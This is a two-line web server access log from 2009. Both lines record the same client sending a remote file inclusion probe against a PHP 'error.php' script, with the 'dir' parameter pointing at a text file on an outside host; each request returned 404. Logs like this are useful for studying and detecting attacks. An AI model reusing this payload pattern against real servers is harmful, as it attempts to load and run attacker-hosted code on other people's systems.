89.234.63.110 - - [22/May/2009:10:47:35 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:47:35 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
